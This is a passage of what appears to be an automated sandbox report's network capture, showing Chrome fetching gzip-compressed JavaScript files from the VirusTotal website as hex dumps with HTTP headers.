                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 31 0d 0a 3f 0d 0a 30 66 66 65 0d 0a a6 44 5e 64 c7 aa 7f 9a b6 36 9e f4 9e 6c d1 3a 8f 67 e9 e4 9d 42 bb 41 f7 a3 31 bb c7 67 28 1c 3d ea ad f5 ba 34 74 39 ca 2c aa 8e 46 c5 3b 83 dd b5 27 28 3c c5 3b 7d b7 b6 f1 b8 bf a6 b7 27 f9 e4 28 c9 0a 01 bf df 7d d2 7f 62 4b 9d 90 64 78 d0 e3 bf 27 dd de 63 53 b0 48 f0 a0 f4 37 36 69 5f da 39 29 92 1b 25 de 9d 8e de a5 34 b3 be b6 d6 df 30 1f 3b 1b 9d 20 61 46 83 27 bd ee 93 cd 75 f3 c5 7c 82 44 a2 36 ad 6d 6c 3c 79 4c 04 bd b6 47 df 33 1d b2 c7 eb 8f c1 b3 7d 36 3e 4d 81 ac db 5d ef 76 7b 7d 7d 56 b0 de 92 e6 36 ba eb 7a 3f d3 b1 63 e4 d7 ba 5b eb 3d 53 6f 96 8c cc 07 20 86 27 60 cd 14 14 64 2b 2a d6 1f af ad af ad 9b 6e 69 1a 2b ed ad 60 6e fd c9 46 55 56 7b 18 3e
                                                                                                                                                                                                                    Data Ascii: 000000010001?0ffeD^d6l:gBA1g(=4t9,F;'(<;}'(}bKdx'cSH76i_9)%40; aF'u|D6ml<yLG3}6>M]v{}}V6z?c[=So '`d+*ni+`nFUV{>
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 26 e4 19 a7 e0 2c 79 4e 84 a2 3c 8e 7a 9b ad 68 13 5b 4c 32 7c 89 27 af a5 d9 f6 88 a5 65 25 f2 90 fb dd dd ad 47 bd 0d 4e 4b d8 5d 7f d4 47 be ea 05 0f b8 7e 94 45 cd de c6 a3 ac b5 b3 b3 fe 41 2e 24 fb e8 96 b6 f4 46 6b f6 a9 82 08 a7 4a 6f d3 5d 6d e9 45 93 e7 54 5c e5 a7 a5 09 d0 92 a1 a9 d2 eb db af 51 ce 7c ed a3 9f af 7f df b6 67 17 b6 59 7c 1e 20 c1 f5 47 7a 9c 71 04 14 7f d6 e8 bb 9e 96 74 70 bb 1c 80 2d 0b 76 56 45 2f 36 37 fd f0 66 cd dc 98 fa 87 41 7d e9 46 fd 1b d9 de fa be 7e e6 a2 5e ec 9e 9f f0 d5 5f 04 d5 bf 0c be a2 20 4a 6f f4 c2 40 f4 f4 5e 65 4d d3 af 16 e4 75 12 52 78 95 61 24 6a 0d 4c 7e 42 13 46 41 ac 9a 64 5a 33 a4 c1 e9 38 91 fb d7 c5 b2 24 1e 40 ef 13 a6 be b7 63 2d d9 0a a5 a7 03 ae 0c 1d 80 83 47 25 a3 50 55 04 7f 6a f7 24 30
                                                                                                                                                                                                                    Data Ascii: &,yN<zh[L2|'e%GNK]G~EA.$FkJo]mET\Q|gY| Gzqtp-vVE/67fA}F~^_ Jo@^eMuRxa$jL~BFAdZ38$@c-G%PUj$0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1308INData Raw: f9 8b 77 25 4b 70 59 79 e0 3f 05 91 51 15 5b e0 a7 53 95 a3 a3 6c 27 cb e1 36 fa 9f a8 e1 e5 01 b3 0c 91 4f 92 df e1 0f 41 28 07 6a 8f 2f 81 78 0e 36 fa d4 c4 78 69 14 25 e1 f6 04 53 cb b6 61 d5 07 e4 5e 5a 58 91 08 eb de 6a 82 6d de 9c d5 4c a0 b8 e3 bd be a0 1c d5 21 85 65 df 28 ea 17 91 26 df 11 5c ad da 34 d9 74 12 11 f9 95 b2 f3 83 ed ac 89 35 e4 24 10 47 c4 c9 50 f1 c0 69 c2 be 36 5d ca 06 c8 61 29 fb 97 2c 76 30 2c 49 c0 ac da 27 92 18 4c c8 0e 82 1b 27 49 4b 05 a6 8d a8 d5 b2 7a 12 e5 51 4c 14 5c 13 0e c8 2a 85 09 94 a0 c3 9e e0 81 47 24 e4 7a 73 c8 0d 42 61 1e 0b 84 8e 27 f2 cc cd 08 07 a7 fb 96 c0 e0 8c 2f 1d e2 e4 b9 47 15 3e 89 d9 a4 29 17 87 1c f5 aa 17 b6 7e 3c d7 5b 4c 28 d7 2e f2 8d 40 c8 d1 d9 19 31 2f 51 71 dd 64 3b 83 6b 79 e9 af e1 f0
                                                                                                                                                                                                                    Data Ascii: w%KpYy?Q[Sl'6OA(j/x6xi%Sa^ZXjmL!e(&\4t5$GPi6]a),v0,I'L'IKzQL\*G$zsBa'/G>)~<[L(.@1/Qqd;ky


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    103192.168.2.164985574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC689OUTGET /gui/27604.cc72e42e5e25c872f1f7.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: e43c68e6158bc168117c6191e97fb77e
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:10:16 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:10:16 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 539110
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a bc 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a 72 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1b 0d 0a 30 30 30 30 30 30 30 31 0d 0a c9 0d 0a 30 30 30 30 30 30 30 31 0d 0a d5 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 30 30 30 30 31 0d 0a f9 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001r000000010000000100000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 45 1d 9d 0e d4 d1 e9 ba 65 dd 20 88 75 0a 2d c0 e9 b2 83 bd c1 5e 6f 19 40 9f d9 a4 d7 37 c8 63 bd 41 1e fe b9 bd 8e a6 e5 c9 63 1d 2f c2 38 4c 62 93 3c c2 ec ee 20 8f 19 e4 11 8f d8 11 4a 2b 0c d3 38 c2 38 00 41 74 10 cf 7e 7c 98 1e 47 f4 33 61 d5 27 07 b3 7b f7 ec fd 24 50 cf 59 44 3d e3 4e 27 a6 9e b3 de 99 a3 9e e9 f5 0c ea b1 b5 3f 01 60 53 00 e6 18 c8 89 03 ea 69 44 2b 27 b7 d1 ca 79 6a c8 1b d3 ca 65 3a 6e 9f fa 89 24 c3 f4 f4 28 3c 54 08 bd 41 24 97 c9 d0 13 c9 65 fb 3c 80 a0 9b 40 24 e1 69 30 6c 9f 57 2b d1 3b 3f 0a 1f aa 36 03 91 9c d4 88 e4 d8 ad 0f 2c fd 13 2b 14 90 38 85 06 1c 89 04 6e 56 44 7c 79 8f 2d a6 68 bf c8 56 93 9d d3 ec 23 5c 22 54 eb 94 b5 fa 80 9f f6 a6 29 68 ee 31 db 51 57 96 4e db 8b c3 c3 2e ec 9c 6d b5 e4 33 59 2b 2c ad a8 09
                                                                                                                                                                                                                    Data Ascii: Ee u-^o@7cAc/8Lb< J+88At~|G3a'{$PYD=N'?`SiD+'yje:n$(<TA$e<@$i0lW+;?6,+8nVD|y-hV#\"T)h1QWN.m3Y+,
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 5a 0a ea 9a 0f 6b b0 6c ce 21 0f 20 79 dd 2c 9a 8f 9e ec 3d 7a c0 cf c4 7e 54 58 c8 56 92 63 78 3a 5b 14 ab 68 a7 bc c5 9c 98 a7 f3 ec 7c 7a 92 ad 16 c5 0e a6 c6 e2 e9 49 3e 67 e2 d1 5b f0 7b 05 b8 4e d9 72 76 4f f2 d1 87 c5 bb dd 77 e3 5d 46 6a c6 35 d9 fe 76 5f bc f9 e1 9b 2d 5e 96 ef a6 e9 ee db 62 3a a6 a9 77 bb cd 41 ef e8 51 e7 c9 fb ab 77 e3 4f fb c9 75 eb dd ce ce 17 c5 79 af f9 6e dc 6e ed 3a e3 18 16 c4 45 ba fb cd f8 24 a7 78 fd 7d 96 62 ce 98 5e 5d 2d d0 dc 24 08 cc 07 90 ca fa 94 96 77 c2 8f 17 8b 71 7e 75 f5 65 af dd 5c 50 b4 75 d4 7d df 42 e9 da 5e dc bb b7 fb 4b 3e fc f3 94 31 54 23 1b a5 18 b4 76 ff c2 3b fa 79 b7 c3 9f ea db da 55 7a 36 61 99 6f 8e 64 9c ae ef dd c3 f0 d0 7d 9f 1c a7 bb af ce f2 22 8b 1b 9e a4 bb 4f cf ce 66 f9 d6 b3 c5
                                                                                                                                                                                                                    Data Ascii: Zkl! y,=z~TXVcx:[h|zI>g[{NrvOw]Fj5v_-^b:wAQwOuynn:E$x}b^]-$wq~ue\Pu}B^K>1T#v;yUz6aod}"Of
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC492INData Raw: 99 b5 9b ab 0e df b2 76 3a eb 60 cb 6f a7 45 27 fb a3 9c d8 33 19 fb 4f 07 b7 63 1b 7c db 50 14 4d 3d 20 20 af 40 67 ba 3d cf 66 eb 30 ca eb 9e 64 d5 7a 1b 22 a4 50 09 ac 2d 79 e4 35 e2 be 86 fe e7 34 5a 3c d3 3c a6 63 b3 8d 39 35 e4 38 fa bd 9a 9e e6 0c c1 0a 21 20 8e 67 79 91 fe d3 e9 5a 8b f9 5b 3e 2e d6 4e 79 89 89 e3 27 63 04 a5 70 50 c0 c0 8a 83 30 e0 7e bb 5d c8 a8 9e 1f 15 ef d9 39 02 98 0a bf 86 9d ee f5 9f 23 24 2c 3b a9 86 0c c2 02 79 5c c6 00 46 c3 3b 48 db 92 a5 be 66 bf 87 3a 8e a1 09 f8 91 1f 1a 44 e6 47 ed 0b 77 ca b2 68 32 71 47 d4 89 ba 90 00 62 73 3e 4e 57 06 b2 a2 ea a4 9d f7 9b db 1e 6a 57 57 c5 81 fd d4 40 c4 80 47 33 10 2b 74 ee 0b 79 1d 8d 21 47 03 b3 6f e5 d8 7c 11 b5 82 58 e2 b8 d0 bf d2 87 7b c9 3f d2 4f ab 85 33 ea 55 5c 35 50
                                                                                                                                                                                                                    Data Ascii: v:`oE'3Oc|PM= @g=f0dz"P-y54Z<<c958! gyZ[>.Ny'cpP0~]9#$,;y\F;Hf:DGwh2qGbs>NWjWW@G3+ty!Go|X{?O3U\5P
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a a7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 28 0d 0a 30 30 30 30 30 30 30 31 0d 0a f4 0d 0a 30 30 30 30 30 30 30 31 0d 0a ed 0d 0a 30 30 31 0d 0a 76 0d 0a 30 66 66 62 0d 0a 1f ba 26 50 81 d0 05 54 73 31 d9 40 c9 e8 13 cd d6 a7 ea 71 ea 47 2a 7a 0f b4 b5 f5 ca ac e4 7e eb 1d 14 69 ed 99 d9 f7 9a 73 36 db 60 3b 36 33 bc 48 6b 8e d6 0c f3 fc ce ac 7a 49 61 2a c9 22 4f 77 8f c4 39 c7 c7 fc 7d f8 f8 91 fe 3e d9 eb e8 9f e3 07 fc fd 72 cf 1e be 3c e6 fb fd bd 07 7a b8 bf f7 c4 1e 32 f7 60 5f 1e 58 b1 07 e3 e1 c3 77 eb 07 b9 3d 3c 39 1e 8d de ad b3 91 3d 8c 1f 65 c7 ef 77 ab 35 ce a2 55 42 23 2d 95 3e 84 91 c3 c6 ff fc cf 06 88 08 5b 58 fc a4 7d d8 59 b0 65 dc ac 59 a0 51 f1 79 e3 6c 0a 11 00 11 4e 63 c5 63 35 d8 de 26 90 c8 05 04 45 9c
                                                                                                                                                                                                                    Data Ascii: 0000000100000001(0000000100000001001v0ffb&PTs1@qG*z~is6`;63HkzIa*"Ow9}>r<z2`_Xw=<9=ew5UB#->[X}YeYQylNcc5&E
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 36 73 da cc 14 25 18 2d 6c 77 1f 2d 74 4e ef f8 ae 26 3b a3 7c aa f0 b1 9e 3d 1c cf 16 58 d0 9c 3c 8e fc 5e aa 69 39 21 d5 8a 35 eb db 8f 22 5d f4 08 7a 68 cf 23 5d 7f e2 07 e4 03 ee b6 83 05 70 0b e7 21 01 e5 8d d9 0a 33 0c 56 f4 20 42 4f 65 58 77 16 d2 52 84 96 85 d4 94 ec 0c fd 7e f1 be df cc cc 75 7a 80 29 20 43 96 3b c4 72 a0 49 b9 27 8d 0e a9 6f de b4 81 2b 5e cf 95 96 2d ca bd 92 76 41 35 19 7f d0 55 32 74 83 f3 9c 28 f4 62 35 c3 16 67 e3 b1 50 55 ac 46 d7 68 f8 d1 38 9d f5 fd 0c cf 95 42 ed 4a 51 1b a7 a9 5f 40 83 77 bf 2c e0 43 d5 5d 10 6e 34 1b 1f 0e 83 86 74 34 b5 b0 af 85 9b 0f 42 f5 c2 e6 13 b4 e0 69 5f cf cc 48 fa 94 95 d9 26 4e 6f 85 7a d5 18 e6 40 2c 27 68 a5 18 cc d3 69 8f 3e a7 f8 b2 ac cc e7 ca 6f c7 e5 4b 53 19 d3 d9 26 f8 7d 4e 33 2e
                                                                                                                                                                                                                    Data Ascii: 6s%-lw-tN&;|=X<^i9!5"]zh#]p!3V BOeXwR~uz) C;rI'o+^-vA5U2t(b5gPUFh8BJQ_@w,C]n4t4Bi_H&Noz@,'hi>oKS&}N3.
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1343INData Raw: c3 3b 10 96 e6 68 2e 9f e4 53 eb cf 31 28 a6 4d fd bd ba ba c4 fd 87 2f 1f 47 10 1b 7a 1c c4 71 e1 41 51 7a 32 cb 36 14 2f 53 3e f8 46 2a 15 e6 63 29 01 db 74 5d 78 c7 e6 8c 6f 79 7b cb a4 c7 79 3c e9 e8 e9 37 27 cd e6 4e fc 86 66 a8 cd b5 94 b1 7f 22 a2 11 40 2d dc 99 02 03 43 75 dc 6f 51 02 22 bc c3 c9 00 e2 c4 a7 25 3e d4 f0 c3 83 48 5d 04 1f 7c 19 d8 31 ff 7d 4e d3 7d 9c e2 b0 ae 69 e5 c4 6f b7 89 73 45 17 50 50 49 f0 98 c6 67 4e 9f 95 f0 f5 e4 79 23 64 1d 04 c5 77 aa 10 ef de 2a 21 da 43 d8 f6 b5 f3 f0 c6 8e 22 93 5b bc e7 57 31 d2 94 ca c7 44 31 e1 0a 4c 6c 9e 84 29 61 c0 a6 19 c5 38 b6 92 57 8a 61 d1 ab 11 8a ec a9 b9 96 7e b0 a3 bc d5 da bf 61 6c 8e 78 e4 2b 2d 71 a4 86 30 3b 84 fb 13 b3 f9 54 b1 1a d3 d5 a5 80 57 85 c3 88 b0 f8 fe ea 6c a3 d4 f7
                                                                                                                                                                                                                    Data Ascii: ;h.S1(M/GzqAQz26/S>F*c)t]xoy{y<7'Nf"@-CuoQ"%>H]|1}N}iosEPPIgNy#dw*!C"[W1D1Ll)a8Wa~alx+-q0;TWl
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 22 0d 0a 30 30 30 30 30 30 30 31 0d 0a 20 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 75 0d 0a 30 66 66 63 0d 0a 7a 73 c0 03 37 db fc ba c7 d6 eb 7e 37 b4 2b 11 22 15 c8 60 eb af 7e 29 57 29 63 86 23 ba cd 8d 15 77 e0 30 ad 62 bb f4 9c 58 e9 86 76 a0 5d 62 3d a7 74 6e 15 c8 47 63 68 a7 19 fe ed c6 2a bb 96 fc 22 4d d3 bf 55 6d 07 93 c1 42 61 21 53 e2 c1 37 c2 1f 17 da 28 e6 b7 bf 3d 6a fc a3 d1 5e bc 4f e7 0a 1b 4f f4 37 9d ea e7 b5 44 88 78 45 49 8a 32 c9 67 44 c2 f8 08 6f da 2b 1f 59 f4 ea 01 76 4c 54 ec 38 97 f4 b8 2c d5 9b cc a2 34 a3 0f f3 a3 0c 62 a8 5e f0 18 68 76 6e 84 f9 b7 3a 49 fe dd 43 58 91 43 37 81 93 b7 06 00 24 7f df b3 bf 52 5a ab b5 f9 8b af c9 8c b6 11 2f 2b 07 d4 4a 80 66 47
                                                                                                                                                                                                                    Data Ascii: 00000001"00000001 0000000100000001u0ffczs7~7+"`~)W)c#w0bXv]b=tnGch*"MUmBa!S7(=j^OO7DxEI2gDo+YvLT8,4b^hvn:ICXC7$RZ/+JfG
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: ee 3a ec 87 9c 3c ff e9 ac d6 47 68 07 e9 73 a3 30 67 0a 11 75 ab c2 75 02 ab 24 5f 84 e1 80 a5 48 bc 60 86 35 59 7d 77 92 f1 cf ee b5 83 74 90 b7 29 ef 7e 7a 61 db 0b cb b1 9c bd f9 ca 5a 43 69 d3 f4 ab 3e 4a 81 dc 04 fa 1b 9f ad 52 c7 0f 2c 90 f3 e0 96 21 95 b4 5e 1b 56 8b 5c 1d 1b c0 d1 42 f8 43 c6 b7 40 a8 de b2 f6 d6 7a 7b ff 5b 87 62 1e ea 6a 10 a0 86 df e2 83 6d 00 d9 cd 19 bd 3c 4a 21 00 46 48 ef 2d 9e 01 9d bc c3 1b a2 0b db 3e 8e 46 67 42 3d dc 1b 68 2a 1c 95 c1 32 8e c9 d3 39 0d 7c 45 e4 c2 ca 1d 8e 90 e9 14 b0 69 34 ae 12 7f 94 df aa 76 2c 85 1d 42 e2 f0 34 46 91 9d e5 7a 08 b2 b8 57 a0 33 db a7 df bc c8 e8 35 85 29 78 7c bf 65 20 65 c9 9b 04 80 6f 4d a7 bc ab 51 95 83 ba 03 24 86 4f 6e f1 18 c4 26 16 4c 48 bf f1 ad 52 73 3e 23 32 2c ca 01 62
                                                                                                                                                                                                                    Data Ascii: :<Ghs0guu$_H`5Y}wt)~zaZCi>JR,!^V\BC@z{[bjm<J!FH->FgB=h*29|Ei4v,B4FzW35)x|e eoMQ$On&LHRs>#2,b
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1336INData Raw: 64 29 99 5b ad 28 85 90 44 6b f3 d1 0e 14 f5 1e 30 cb e4 fa 7c 40 37 36 f6 b0 0f b8 e9 79 d2 b2 2f f6 3b d0 e5 8d 79 4a 67 81 f1 5c 88 f1 dc f8 d8 c2 92 67 4b fc b2 2e bd 4a 7f 0a 6d c3 8f fc 96 e0 ea e3 49 e7 05 24 17 46 e2 7c 46 0a e8 93 66 11 d2 12 0a 0d e4 3a 32 7e 1a da 42 ae 8d bd 3f af 22 46 20 72 12 2b cb fc de c4 8e e1 64 39 44 a7 15 19 22 08 ce c2 1c 46 a6 08 25 53 17 f3 42 26 73 bb 9a 3d 32 62 72 4c 7b 16 bb 0c a2 6a 90 1c 02 9f 1d 39 3e 2b f6 b2 50 24 61 5f 99 8c d6 9a 0c d6 37 4c a4 a8 75 eb c0 5a d7 9e 95 da 67 b6 4a b8 d6 2c 59 73 95 86 83 bd f2 87 c1 a7 75 c9 8a 7a 7d b9 6a ae c9 b3 cd 6a f9 61 87 72 9c c8 08 7a a4 64 a6 aa 68 28 70 1d e8 79 eb 69 c4 a5 cd 31 12 52 6f c8 9f 68 4a 2e a4 34 e8 91 30 6e d9 6e 09 06 9d a6 ec 19 27 85 02 96 3a
                                                                                                                                                                                                                    Data Ascii: d)[(Dk0|@76y/;yJg\gK.JmI$F|Ff:2~B?"F r+d9D"F%SB&s=2brL{j9>+P$a_7LuZgJ,Ysuz}jjarzdh(pyi1RohJ.40nn':


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    104192.168.2.164985374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/54383.6935deb0ecf100e5b899.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 42c37fd9b062d9368d187130bbb88948
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:04:11 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:04:11 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 539475
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 31 0d 0a db 0d 0a 30 66 66 31 0d 0a 36 96 fe de 5f c1 68 bb 3e 64 4c d3 92 fc a6 48 a1 dd d4 71 32 9e 4d 9c 9c d8 69 bb e3 7a 54 5a a2 6d 36 14 e9 43 52 76 3c b6 fe fb 3e 78 25 08 80 4a 9a 49 3b 3d 67 9b 0f
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001]00000001m00000001w000010ff16_h>dLHq2MizTZm6CRv<>x%JI;=g
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: fc 88 ce 9a 46 d3 df 8f df 1c 29 0d 2f 30 83 79 d3 71 2d 04 d2 88 04 85 81 6c e1 c8 fc bb 42 5e 6b 45 57 a5 f3 f9 c5 5b 2c df d1 65 1c de e4 98 00 dd 11 5d 75 9c 71 98 bb 91 bb d3 1d 6c 6f 7a 1e 1c 92 7c db 18 74 b7 37 3c 36 83 0b 7f 32 12 16 76 c8 4a 76 5f de 26 d5 e4 8a 7c 9a 44 d8 25 ba 43 f2 a7 f3 c3 c1 bb e7 87 fb 27 e3 f7 47 ff 73 f4 e6 c7 a3 ce 90 cf e7 22 d0 20 23 4a b5 d9 a4 fa fe e0 e8 f0 a5 8d 88 01 18 cd a0 49 f3 fe e8 f9 c1 c9 c1 fe c9 c1 73 ab 30 01 64 b4 bd 7e 93 f8 f8 fd f1 db c3 fd c3 37 ef 8f 2d c4 35 90 13 6f 37 89 5f 3f 7b d5 4a 2b 61 23 e1 71 d2 10 ef 8f de 1d ec bf 79 79 74 f8 8f 83 e7 ca 14 9a 5b 8c 6a 58 8d 9b d3 30 33 53 b0 46 67 f6 d2 b1 b9 79 75 e4 da 82 3a 41 0d e9 e8 44 b5 71 74 a2 1a 62 10 49 ab e8 34 12 d0 d1 ec d5 11 8e a4
                                                                                                                                                                                                                    Data Ascii: F)/0yq-lB^kEW[,e]uqloz|t7<62vJv_&|D%C'Gs" #JIs0d~7-5o7_?{J+a#qyyt[jX03SFgyu:ADqtbI4
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: f6 39 aa b6 b7 db 91 37 80 dc d8 e7 d9 f3 9f 48 6c d8 38 55 54 58 6f 02 bb de 94 97 a2 6e 01 55 d9 40 21 9d ee 56 0d 76 db 0c 47 7a 0a d9 2f ad 88 3b 1a a2 ba 5d b0 9d d1 4a 36 d0 c8 8c 2d cc 4a f5 44 a3 52 85 c1 e1 58 20 6f a5 ec 75 35 52 7d eb b1 53 91 b1 55 73 0d 63 63 b1 93 91 71 56 c9 8c 6d c3 4e 46 46 bc 49 66 6e 08 76 4a 32 fa 2a a5 b9 d8 db e9 b8 2b c8 61 e6 6b ba 1d 99 fb 04 16 32 91 3d d8 f1 b8 4b 00 cf 58 a2 ed 04 dc 19 40 50 2f c6 76 4c ee 00 c0 d4 56 5c 2b 7a 9f 0c ba b2 38 81 4c 5d 28 ed 34 64 c8 15 1a 69 9a 4f 53 92 51 b7 51 72 55 75 71 e2 50 1b 13 fa 43 72 4d 1e ac b9 3b 2b 24 0a e7 a7 dc 31 1e be f1 47 18 24 b5 61 0b 67 62 5d d9 f0 4c 29 69 ae 15 64 61 4b 94 05 81 7c 97 29 90 25 47 59 59 21 8f 9d ec 69 ce 5e 62 59 df 8e e8 f3 17 44 da c6
                                                                                                                                                                                                                    Data Ascii: 97Hl8UTXonU@!VvGz/;]J6-JDRX ou5R}SUsccqVmNFFIfnvJ2*+ak2=KX@P/vLV\+z8L](4diOSQQrUuqPCrM;+$1G$agb]L)idaK|)%GYY!i^bYD
